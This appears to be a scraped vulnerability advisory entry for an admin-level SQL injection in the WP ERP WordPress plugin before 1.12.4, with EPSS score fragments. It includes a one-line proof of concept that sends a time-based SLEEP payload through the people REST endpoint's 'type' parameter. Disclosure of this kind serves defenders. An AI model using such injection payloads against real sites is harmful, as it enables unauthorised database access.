Lucene search

K
wpexploitArvandyWPEX-ID:435DA8A1-9955-46D7-A508-B5738259E731
HistoryJun 05, 2023 - 12:00 a.m.

WP ERP < 1.12.4 - Admin+ SQL Injection

2023-06-0500:00:00
Arvandy
47
wordpress
erp
sql injection
admin
vulnerability
exploit

0.001 Low

EPSS

Percentile

41.0%

The plugin does not properly sanitise and escape the type parameter in the erp/v1/accounting/v1/people REST API endpoint before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.

Sign in as an admin. In WP Admin, run the following code in the browser console, and notice that it takes several seconds to complete, demonstrating the SQL Injection vulnerability.

await wp.apiRequest({path: `/erp/v1/accounting/v1/people?type=x')+AND+(SELECT+1+FROM+(SELECT+SLEEP(3))x)+AND+('x'%3d'x`});

0.001 Low

EPSS

Percentile

41.0%

Related for WPEX-ID:435DA8A1-9955-46D7-A508-B5738259E731